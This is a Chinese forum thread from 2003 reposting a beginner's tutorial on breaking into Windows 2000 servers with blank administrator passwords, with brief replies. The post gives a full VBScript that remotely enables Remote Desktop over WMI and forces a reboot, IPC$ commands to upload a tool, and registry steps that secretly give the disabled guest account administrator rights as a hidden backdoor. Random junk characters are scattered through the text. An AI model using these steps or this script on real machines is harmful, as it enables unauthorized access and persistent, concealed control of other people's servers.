设为首页收藏本站
开启辅助访问

下沙论坛

 找回密码
 注册论坛(EC通行证)

QQ登录

QQ登录

 下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
下沙论坛»下沙论坛 ╃摩登&时代╃ 科技.电脑网络 一次简单的3389入侵
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用
返回列表 发新帖
查看: 3734|回复: 4
打印 上一主题 下一主题

一次简单的3389入侵

[复制链接]
firelinux

该用户从未签到
跳转到指定楼层
1
发表于 2003-3-17 15:34:00 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
一次简单的3389入侵过程 H7 ?* O0 ~8 Y% m( @% B( r2 E 原创:caozhe(草哲) 6 ], q- c3 Q/ A7 Z6 U; [4 f8 I来源:中国欲网技术论坛--草哲 ! n2 Q' o& |) k4 S 6 g3 }: E/ \- G' w5 F- W 我在网上看到很多很多教你如何如何入侵之类的文章,我觉得对于菜鸟来说根本是看不懂的! $ U8 C# e: S, x& Z 6 A$ U3 O6 M* b2 r8 ?, w. V- N7 t于是呢,我冒出个想法!想写篇简单点的,适合菜鸟的文章!把我学到的跟大家说一下~!% l. H: U9 |; d, M- M" u2 V 要入侵,我建议你在win2000环境下来*作! 5 A( @# ^' U2 t4 l1 }/ `0 J" R/ t1 k# j 首先,要入侵,你得有工具!我向大家推荐几款软件,也是我一直用的东西! ; c$ R* l: u" D* P! {0 O扫描的X-Scan V2.3、WINNTAutoAttack、流光! ; ~; d$ E! p: r9 ]% T, fX-Scan我最近很少用了,基本用的都是WINNTAutoAttack,当然,小榕的流光我也经常用!; E6 ]% J- y! u% a) c T1 b/ G; z 远程开终端需要一个脚本就可以了,代码请看二楼!保存为*.vbe(我保存的是rots.vbe) 4 ?4 p T$ G" j4 E7 C, X% J# B# {克隆帐户用个psu就可以了~!1 q5 G1 I u" l+ ]& k9 q 4 m6 V* `3 p+ \OK,比如扫描到了一个有NT弱口令的服务器,IP地址是120.0.0.1,管理员帐户是administrator,密码为空 - Q$ X( E7 a& }$ q1 F运行CMD(2000下的DOS),我们给它开终端! ! \7 h q% {0 z1 p( i命令如下!1 |) V8 |) j6 D- ^% g cscript rots.vbe 120.0.0.1 administrator "" 3389 /fr( L5 d, W2 k& y% f' V/ \ 上面的命令应该可以理解吧?cscript rots.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为120.0.0.1这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启)7 j7 B6 b( {, L1 E# k! U# L: v # G: i- A1 w; o$ I因为终端服务器只在win2000 server以上的版本(包括server)才有,PRO当然是不行的,此版本可以检测服务器的版本,如果是PRO的则提示你退出安装! 3 l0 E; M8 H# E5 k! _3 G3 p0 u 7 J+ B" P+ z8 Y0 m2 |/ O0 _" |4 n) @一切顺利,过会就可以连接到终端了,我们可以ping它,看是否重启,ping 120.0.0.1 -t 1 Y, q4 Y6 N0 {9 p; Y% m4 a. i安装后用连接工具连接终端!现在我们克隆帐户,呵呵,为了给以后方便嘛! 4 `" ?! H* \/ p( l) ]8 U0 K4 q4 k( m! G 回到DOS下!我们建立IPC$连接! 2 t( P, E" x Tnet use \\120.0.0.1\ipc$ "" /user:"administrator"+ n4 j' M& k1 e& \7 v4 I 这个命令我想应该可以理解吧!命令完成后,我们把psu上传到目标机的winnt\system32目录下!1 n2 Y1 |! h! ^4 \" k copy psu.exe \\120.0.0.1\admin$\system32+ g$ C& Z- s- r$ v4 N' u 上传完毕后,开始在肉鸡做后门帐户!看肉鸡! ' q1 \8 U4 b% U" Z+ N% K) Y1 `, ?1 ?3 T2 k. X0 s 假设guest用户被禁用,我们就是要利用guest做后门帐户! 9 D& q7 s) H5 B* E; ~/ X$ U) b在该服务器运行CMD,在命令行下输入 + g4 D4 s y. t# f7 t! ppsu -p regedit -i PID $ G* z5 {9 q9 g3 G & P2 h& \0 r- D- M! Z- a, s这里解释一下,后面的PID是系统进程winlogon的值,我们在任务栏下点鼠标右键,看任务管理器!+ W/ c& C" u2 u+ Q* W( v0 a- K 看进程选项卡,找到winlogon的进程,后面的数值就是winlogon的pid值,假设是5458% g. W8 w- l4 _. N+ Y$ ` 那么,命令就是这样/ G7 X3 P n# M! }! ] psu -p regedit -i 5458+ Y6 Y J4 h+ f( d: W% | 这样直接打开注册表,可以读取本地sam的信息。: [9 I# w# z w* | 打开键值HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users* g! Y: [2 B/ r, P3 D 下面的就是本地的用户信息了!我们要做的是把禁用的guest克隆成管理员权限的帐户! - b" T# a k9 yHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names: _8 w/ _: Q7 V5 T( B 查看administrator的类型,是if4,再看guest的是if55 @: [. p0 Y9 G/ F3 @/ [ 好了,知道了类型后,打开3 F+ f2 h3 Y6 C" f' x1 m" z' ? HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F41 V# H; x* |; }5 K$ g, [& p* ^4 k 这个值,双击右侧的F,把里面乱七八糟的字符复制下来,然后打开5 r7 p/ M# v I0 ~" O HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5/ [! a* Y& u# _ 双击右侧的F,把刚复制的粘贴到里面! 6 H; B* W; q8 [3 @% `, v' Z ^; E2 R, m" [+ z3 n/ R J6 V 做好了以后,把HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5 ) ~9 R m9 @, Y和HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest( w$ y+ y( u. y; ` 这两个键值导出,导出后把那两个键值删除!然后再导入进来!关闭注册表。" Z7 Y7 V. w# x0 b$ e" s( ? 0 {; i+ e5 t9 k, i+ D# n打开CMD,在命令行下输入 : ?. F4 a" q8 J4 [, Rnet user guest password & u7 G i0 _ [7 X/ U1 r这条命令是给guest设置密码,后面的password就是密码. z8 M' k7 j) e/ X 然后输入 " b. t6 t! [; b( `/ h# d& [net user guest /active:y! O2 h- ~, P% L O 这命令是激活guest帐户,然后我们把他禁用, _ ?) @% Z0 K5 }$ H net user guest /active:n / G$ u) { C3 z7 ~9 }上面的三行命令必须在DOS下执行! 7 H& n0 ^% M0 ?! b, c ' w z! {, s) Z1 \2 L6 K4 f& ]OK了,打开计算机管理,看用户,你们看,guest帐户还是被禁用的~!哈哈,但它已经拥有管理员权限了! 6 t: x* S; o A5 S+ H9 B% Y! B而且并不在管理员组里显示,还可以登陆终端,跟administrator帐户一样的! 0 H1 K) P8 v% m8 Y5 Z; M ' |# ?# I$ R- Z4 b4 Q* s0 I1 |注销一下,用guest登陆吧! 1 L# Z6 `' v- u3 K ; j3 y7 V( e" j" [) j) ]打字都打累了~`!真不容易!呵呵~`希望上面的大家能看懂啊! " R, b% w6 l! |9 S+ F如果还有地方不明白的话,可以问我,我知道的一定告诉大家! b M3 G" ?+ |% L3 A. E $ s4 ?% K3 v `3 G% g 因为本人也是菜鸟级的,会了点东西就不知道怎么好了,呵呵~`!如果哪里有不对的,还请高手指点啊~! 7 k8 H! S" C/ f5 Q: B% ` 2 Q6 w7 O* ]1 y+ L5 o9 u# t9 V" ?---------------------------------------------------------------------- 4 y7 Y, d' S/ S, W; a9 E4 X+ s以下是开终端的脚本,把它存为*.vbe 3 c. S6 N2 J! A6 Xon error resume next: r. K8 O, t; M. E6 Q. V3 x set outstreem=wscript.stdout 3 F' }9 C) k. \3 oset instreem=wscript.stdin + g: J5 a. r0 P0 K& N6 f3 Iif (lcase(right(wscript.fullname,11))="wscript.exe") then6 ~1 H. H5 j% b# K+ X" ^ set objShell=wscript.createObject("wscript.shell") - l' W' |' M8 L' A# V: N$ [+ q0 v objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))# x! G! J) J. ^- l$ d/ ^5 i wscript.quit * I [1 k$ n! t O' k2 I6 N0 Wend if ( P- h& E( d$ p: Y- N- K% }if wscript.arguments.count<3 then% n& e; m B: g, r) ?1 F6 j& i usage()' n7 {0 i; |+ P1 _1 R8 k2 C wscript.echo "Not enough parameters." , w9 C, Y: g2 f wscript.quit + `4 {/ ?2 m4 q4 H; yend if ; F# w" x4 x9 z, E / q1 a" x* i D3 Z1 Pipaddress=wscript.arguments(0) $ K1 K, }3 A' U' s3 h2 G3 d2 ?username=wscript.arguments(1) 5 C `6 o! Q1 g) Q: Vpassword=wscript.arguments(2) ; I9 n* q l" I% W/ R6 Z3 t4 kif wscript.arguments.count>3 then2 X" D* ?) n8 r, u" v" S% F' x port=wscript.arguments(3) $ Z2 i( `9 u- h8 Eelse& a" f( v: _/ T! E: L, F port=3389. L' |% { b6 b end if% `' G5 |3 K. r9 q( l! }: R t3 ] if not isnumeric(port) or port<1 or port>65000 then ) A6 m! v' e* }2 j wscript.echo "The number of port is error." $ V0 n% ~* x% G8 Y" n wscript.quit & R) T+ i# _0 n+ ?9 Jend if + f w a$ x+ a6 B S; R7 zif wscript.arguments.count>4 then: s9 B1 W/ S. c% }- T1 ~8 @ reboot=wscript.arguments(4)' N" |# t* Q& B0 e8 ^ else/ j# R! X/ Q+ x9 m reboot="") q3 W- Y6 U: b; C( r end if5 X; H$ E! X3 Y ' {/ ?) c; Z6 i2 F" Susage() $ K6 L$ {; W/ A2 q7 t1 t( k# Joutstreem.write "Conneting "&ipaddress&" ....", X U) r) y7 g5 { set objlocator=createobject("wbemscripting.swbemlocator") 7 F/ Y- ]) s; j/ u- mset objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)- s4 O1 d6 a. @, a( ]" v showerror(err.number)$ d$ {: W5 c7 r; K" e* c4 N: p objswbemservices.security_.privileges.add 23,true * k- R8 w6 ?9 k3 Yobjswbemservices.security_.privileges.add 18,true * b2 s7 l v( R3 e" K# d) H1 F; r & V' @1 @9 h1 n" r zoutstreem.write "Checking OS type...." $ { C) d3 g/ y; Z P2 sset colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")$ ^9 T4 N6 {/ l for each objinstoscaption in colinstoscaption& u) L7 r- \9 i u. Q: ^ if instr(objinstoscaption.caption,"Server")>0 then + b. b. k) s7 E: _( c: d S; h7 Z' q wscript.echo "OK!"% i3 B; |% L/ o8 b6 f6 t2 e else # A: L" N2 c6 k7 T$ P! m wscript.echo "OS type is "&objinstoscaption.caption / k3 t ^5 ]8 g9 ~, G3 H outstreem.write "Do you want to cancel setup?[y/n]" 3 @5 D) x2 W! G' F strcancel=instreem.readline 0 @- b$ a5 q9 r2 \# j0 G+ l if lcase(strcancel)<>"n" then wscript.quit 5 k7 ]( H+ f' S! b4 S4 a6 W end if1 o5 i! h- f4 l! E, x& o next( M M$ r) B, M 3 a' L4 t5 E4 Y, ]( M$ F outstreem.write "Writing into registry ...."& h& k& @, v5 _2 E set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")5 Z& ~8 P; Q& j2 B" K# k: [* C* b HKLM=&h800000020 ]+ f6 T/ N% w/ z9 H# Q, j HKU=&h80000003- S7 @7 G7 F a, f7 Y with objinstreg4 h! a& p6 A L7 K* I3 S: W0 g0 h .createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"# k. J; m$ |: O1 F .setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",02 j, g% J; b6 b1 Z6 Y( C3 A .createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer" 0 ~4 q" h+ K9 ?: ]9 X0 N% J. E* U6 o.setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",12 k5 d/ }; Z$ Z: h0 Z9 ~& p; | .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1 : J) `; S( i# m4 y1 ^: X" u+ x- n8 }1 I.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2 ; |4 C! j1 h1 S7 `! E.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2, X0 ~) Z2 E4 g# d! } .setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"+ X) ^4 e" M4 q7 {4 _5 |5 i .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port/ E5 p; [- R, i8 D( M& G. Y8 w end with; |9 p! Q. K! h( |! o) ?7 T S showerror(err.number) 1 X4 g! u9 z! |$ ?5 J' y' S. _( ?2 l8 S8 ^" r% ? rebt=lcase(reboot) ! y! ?* p$ t* P: z9 a' Q3 z" ]5 U2 Mflag=03 I8 H7 {% w6 A' w- ^ K if rebt="/r" or rebt="-r" or rebt="\r" then flag=23 R. v! m& R0 s, P. B ` if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6' _, y G9 O! f% L. h T: r if flag<>0 then) x1 t3 Q& r. o outstreem.write "Now, reboot target...." $ G T' N' P5 D2 e- o% {7 p# y strwqlquery="select * from win32_operatingsystem where primary='true'" ' m- C0 u, j" ? set colinstances=objswbemservices.execquery(strwqlquery); x% a8 ^1 @5 \- n+ R$ ^3 c for each objinstance in colinstances 1 ^% v; b& L0 \6 n' D- O6 T objinstance.win32shutdown(flag)1 F5 C" \4 _' A# I next ' L, I* E, u/ T/ G showerror(err.number) . Z& u9 a4 l3 @4 y: P7 `else( Y, A/ H2 h6 j0 G wscript.echo "You need to reboot target."&vbcrlf&"Then," ( Q; ?/ @. T$ }5 M- Jend if v6 P# h: @3 M! M# K1 bwscript.echo "You can logon terminal services on "&port&" later. Good luck!"3 [( R% x) Q/ n3 X5 t' W 5 c# O# x( _5 W( T9 c& o function showerror(errornumber) 6 ~# }4 _/ H$ o+ x6 X$ yif errornumber Then2 E7 R7 `0 z2 R( l$ p& Y8 b, v# Q wscript.echo "Error 0x"&cstr(hex(err.number))&" ." ; j; J, |: n" Z5 |7 E* f3 {. R if err.description <> "" then& }* _/ m* p# P5 u. | wscript.echo "Error description: "&err.description&"." / n) H; v: P: x, ]2 `1 v3 h* ^ end if) W9 z( P& q" K/ K( C wscript.quit ( H1 r8 l5 H+ ielse 8 j7 D8 E0 f' S3 b. g wscript.echo "OK!" & u4 L$ t$ S3 _end if 4 D/ _+ S3 O* Q5 _% iend function" C9 D* ]* E1 r ! Z H( { [3 g5 h: ~ function usage() ; z/ {4 g0 d3 y( S! L6 C2 Z$ vwscript.echo string(79,"*") ' D L. C& l0 Q1 |3 R# B2 \wscript.echo "ROTS v1.05" , j% \' M5 j6 A) M0 Awscript.echo "Remote Open Terminal services Script, by 草哲"/ f* V' M% s3 M wscript.echo "Welcome to visite www.5458.net"2 s# n) L Y/ J wscript.echo "Usage:" ' I$ y' T L. t3 J" v. _1 i" {wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"8 t7 I: a$ V; W$ V wscript.echo "port: default number is 3389." / v' Y* z3 a3 M2 y0 Ewscript.echo "/r: auto reboot target." Z5 p% ?- z' P# y% z5 V wscript.echo "/fr: auto force reboot target." # m; V5 p9 d0 x7 J n0 ~wscript.echo string(79,"*")&vbcrlf& ?0 Y2 I4 N& J+ ?' f end function( W! \/ L0 R0 L , H$ M$ ]( L! {+ v7 { 转自安全焦点
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享分享 顶 踩
回复

使用道具 举报

安哲有德 该用户已被删除
2
发表于 2003-3-20 00:24:00 | 只看该作者
这么好的东西好象没有人看,是不感兴趣吗?
  E/ S/ D3 x4 l( m& K) w还是什么的,看来我们工程学院还真有很多不错的角色哦!
回复 支持 反对

使用道具 举报

安哲有德 该用户已被删除
3
发表于 2003-3-20 00:28:00 | 只看该作者
不过你还是说得简单点吧,估计那样的话会有多一点的人看的- Z6 o6 B3 C" ~
% z- G7 ]  K. s/ ^, k
回复 支持 反对

使用道具 举报

安哲有德 该用户已被删除
4
发表于 2003-3-20 00:30:00 | 只看该作者

  O* M( }: h5 V$ ?
/ |" R2 q3 D8 D8 R. K+ V; ]/ r! V) v8 T) d9 _+ d/ P1 v8 O2 u

% h' V& N# ~. o& e9 u2 K, ~! }; f& ^8 D
[此贴子已经被作者于2003-3-24 21:15:45编辑过]

; [' j7 s" |7 a- e
回复 支持 反对

使用道具 举报

丧心病狂 该用户已被删除
5
发表于 2003-3-20 14:00:00 | 只看该作者
这个类似的我看多了,3389的漏洞好像都在一夜间成名,然后一夜间被人疯狂堵上。
回复 支持 反对

使用道具 举报

返回列表 发新帖

本版积分规则

关闭

下沙大学生网推荐上一条 /1 下一条

快速回复 返回顶部 返回列表